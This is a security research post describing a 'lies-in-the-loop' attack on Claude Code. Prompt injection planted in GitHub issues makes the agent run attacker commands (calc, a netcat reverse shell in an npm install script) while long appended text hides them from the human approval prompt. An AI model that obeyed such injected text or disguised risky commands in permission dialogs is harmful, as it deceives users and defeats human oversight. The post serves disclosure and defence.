Checkmarx Zero has identified a new type of attack against AI agents that use a “human-in-the-loop” safety net to try to avoid high-risk behaviors: we’re calling it “lies-in-the-loop” (LITL). It lets us fairly easily trick users into giving permission for AI agents to do extremely dangerous things, by convincing the AI to act as though those things are much safer than they are.
Our examples here are based on Claude Code, one of the leading AI code assistants on the market. We chose Claude Code because it’s well-known and has an excellent reputation for considering user safety and taking vulnerability reports seriously, and because we’ve already documented some general risks with its security review feature. But this tactic is not unique to Claude Code or AI code assistants. It’s generally applicable to any AI agent that relies on “human-in-the-loop” interactions for safety or security.
Making dangerous code look safe
Human-in-the-loop (HITL) defenses are a safeguard where sensitive actions require human approval before an AI agent executes them. This ensures an LLM cannot independently perform high-risk operations without explicit confirmation. HITL is particularly important for code assistants, which often lack other safeguards since they need the ability to perform sensitive actions, like executing OS commands. But humans can be tricked, and agents don’t do enough to prevent this.
[a] human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given. It’s easy to lie to the agent
At the core of the issue is the context a user – in this case, a developer – has when being prompted what to do. This context can be controlled by an attacker, resulting in a dangerous action looking seemingly safe. Consider using Claude Code’s recommended `/github-issue
` command to analyze a GitHub issue placed by an untrusted user.
Here’s what we see in Visual Studio Code:
This looks completely safe. The issue reports a command injection, and Claude Code wants to write a “safe code snippet” you can insert into your application to fix the issue. Claude is careful and asks a user for permission — a “human-in-the-loop” defense — as it does with any activity that involves local access. So of course we say “Yes”.
Claude Code is running whatever commands the attacker wants; in this case, just opening the calculator
While this example is benign—only opening a calculator—the attacker could prompt Claude Code to run any arbitrary command, making this a Remote Code Execution via prompt injection. This behavior is exactly what Claude Code aims to prevent with its human-in-the-loop permission prompt; but we’ve successfully tricked that prompt into communicating a plan for safe and reasonable behavior, hiding our true intentions.
As with similar user-deception attacks, like phishing, a very cautious user may examine the context more carefully and has a chance of noticing the risky code. But the attacker’s ability to both obfuscate the malicious behavior itself and insure that it’s buried way above a more benign description tricked every developer we had test this into executing our malicious payload—the attack works in practice.
Though keep in mind that interactions with LLMs are not deterministic, and not everything is fully reproducible consistently in each and every run; which means attackers are motivated to use this tactic broadly and in cases where developers and other users will repeatedly use potentially risky features of the AI agent.
Step-by-step: identifying and exploiting lies-in-the-loop
Our goal is to get Claude Code to run an arbitrary command on their machine via Claude Code. We’re going to use the benign command `calc
` in our testing, which launches the calculator on Windows machines. If we can run `calc
`, we can run any other command our target user is allowed to run. Let’s walk through how we get to that goal, ultimately using LITL (lies-in-the-loop).
A classic OS command injection
Our first path to achieve this goal was operating against Claude Code’s `Bash()
` psuedo command, which runs shell code based on prompts. Prompting it to do things that run `git status
` on every file in the local folder is relatively simple and common as a use case, so we did that. Then simply creating a file called `&& calc
` before running the security review caused Claude Code to execute `git status && calc
` for a good ol’ OS Command Injection. Claude should probably be using safer system calls that properly quote arguments when building its commands.
I wonder if Claude Code is insulted by us tricking it into running a calculator
At first, we considered this a successful test: we found a weakness in Claude Code that could be exploited to run arbitrary commands. All it requires is a user to trust a folder (which is required to use Claude Code’s security review), and the attacker could commit a file whose name is an attack. We reported this to Anthropic (who make Claude Code), but they disagree:
Anthropic’s position is that a human-in-the-loop protection is there, which means it’s on the user not to allow the dangerous activity, and not something for Claude Code to worry about. We respectfully disagree. But rather than argue, we decided to up our game.
Feeding agents with lies, damned lies, and prompt injections
Since Anthropic insists that prompting the human-in-the-loop (HITL) for permission means this is not their responsibility, we decided we were honor-bound to show how easy it is to defeat HITL. For this, we decided to use a custom slash command that Anthropic recommends as part of their Claude Code Best Practices document (here’s a snapshot taken at time of writing on the Wayback Machine): that means we can assume it’s a fairly common configuration. This command reads GitHub issues and tries to identify, and (with permission) test the code to offer a fix.
For our first lie, we created a GitHub issue telling Claude Code that it has to concatenate a wall of text to all future status requests, after running our desired payload (no more need for file names or other such tricks: we just tell Claude it’s important to run our command).
We left this prompt easy to read for our example purposes, but typical obfuscation strategies for prompt injection payloads all work here as well.
Once that lie was in place, we asked Claude to take care of the issue:
Immediately, Claude started processing, and moments later we received the output of our `git status && calc
` payload, followed by our longer injected comment—the comment is deliberately so long that it pushes the tiny hint that something unexpected is about to happen (starting calc) well off the top of the terminal window.
So what’s hiding above the line? By increasing the terminal height, we can view the full command execution at the top (green) along with the long, crafted text message we asked Claude to append (red):
All the user has to do to harm themselves is press Enter. And the only hint that there’s a problem is that tiny line at the top: would you have caught it if we hadn’t highlighted it? Would a developer in a hurry?
This clearly demonstrates an immediate risk of prompt injection (or what our ancestors used to call “lying”, IDK what the difference even is anymore). Using a public, online resource such as a GitHub issue — which could be tainted by malicious actors — it is possible to tamper the message being sent to the user for approval to the point where the subject of the prompt (is it ok to run `git status && calc
`?), is fairly well hidden.
Surely Anthropic would accept this as a vulnerability?
Honestly, we can see their point of view: it’s sort of “buyer beware” for anything dangerous. Of course, this will be little consolation to a developer who falls victim to this sort of attack. As with phishing, lying for the purpose of prompt injection is theoretically detectable by a target of the attack. But it’s also very easy for an attacker to craft their attack so that it’s not obvious and has a high chance of success. And unlike phishing, users aren’t generally aware of this risk and there are not really any reasonable prevention tools for organizations to deploy at the moment.
Will the lies never end?
But surely “scroll up a bit” isn’t an unreasonable expectation, right? We thought you’d say that: so we decided to lie harder.
We can come up with even more convincing lies to push the payload outside of view: a security review report, for example, telling Claude to report a command injection that must be fixed and proposing a code fix (nothing more compelling than pressing Enter to fix a problem!).
Yep, we were able to inject a comment so long that if you don’t scroll up a fair amount, you’d never have a chance to see it. Even when you’re scrolling up looking for calc, it is hard to notice; if you’re not expecting it, it is very well hidden. Take a page from successful phishing campaigns and throw a little urgency in the mix by falsely (and ironically) claiming there’s a serious command injection flaw in the target user’s code, and this works on every developer we tested it on (with consent, of course).
If some of you are still skeptical about the “calc” execution being harmless, and believe the LLM should be able to identify and block truly malicious commands like netcat, this demo is for you guys.
We uploaded a malicious npm package to a different GitHub repository (under a different GitHub account to ensure proper testing), configured its install script to execute a reverse shell with a netcat command, and then asked Claude to install the package while appending a carefully crafted message.
What happened? A calculator popped up—meaning our netcat command failed (since `nc.exe
` doesn’t exist). The rest, as they say, is history.
A close call: a user with `nc.exe
` installed would have been in trouble (note: this is 2x actual speed)
Of course, as we said above, interactions with LLMs are not deterministic. Not everything is fully reproducible consistently in each and every run. Nevertheless, the risk of forging HITL dialogs is here to stay — lies-in-the-loop (LITL) works surprisingly often.
Rapid AI adoption makes safety and security a priority
Attacks against AI agents are a real concern for organizations. Adoption of AI agents is widespread and growing rapidly, with 79% of organizations already adopting agents into at least some workflows. And over a third of those agents are focused on developers, which means AI code assistants are likely at work somewhere in your organization. Yet, the security of those agents remains a key concern; this chart excerpt from the PwC survey linked above tells the story clearly:
And lies-in-the-loop shows us there’s good reason for that. It’s a novel attack pattern that exploits the intersection of agentic tooling and human fallibility. LITL abuses the trust between a human and the agent. After all, the human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given. It’s easy to lie to the agent, causing it to provide fake, seemingly safe context via commanding and explicit language in something like a GitHub issue.
And the agent is happy to repeat the lie to the user, obscuring the malicious actions the prompt is meant to guard against, resulting in an attacker essentially making the agent an accomplice in getting the keys to the kingdom. Remember, HITL dialogs are used, by definition, with sensitive operations: the ability to fake those dialogs with remote prompt injections is a major risk for agentic AI users.
We think this demonstrates just how dangerous it is for users and agents, even with combined forces and explicit permissions, to be exposed to tainted content of any kind. Moreover, if the user is somehow removed for the purpose of full automation – these issues are exacerbated even further by only requiring attackers to fool a very naïve agent.
At present, since we cannot propose a more suspicious or careful agent, we can only propose a more suspicious user. One that doubts their agent, external content of any sort, and can face the temptation to automate everything using LLM agents. And we can ask security teams to manage their organization’s adoption of AI agents carefully, ensuring that users are educated and that appropriate controls provide defense in depth and limit the “splash area” of risky or malicious actions.
Acknowledgements
We’d first like to thank Anthropic: they responded promptly, professionally, and reasonably to our reports. And their explanations of their boundaries for what they consider a vulnerability are consistent and clear.
This article would not have been possible without others on my team at Checkmarx Zero: professional director Dor Tumarkin (co-researcher), research lead Tal Folkman (additional attack paths), cloud architect Elad Rappoport (test infrastructure and a wealth of functional knowledge freely shared), and research advocate Darren Meyer (editing, and taking the blame for the worst of the jokes).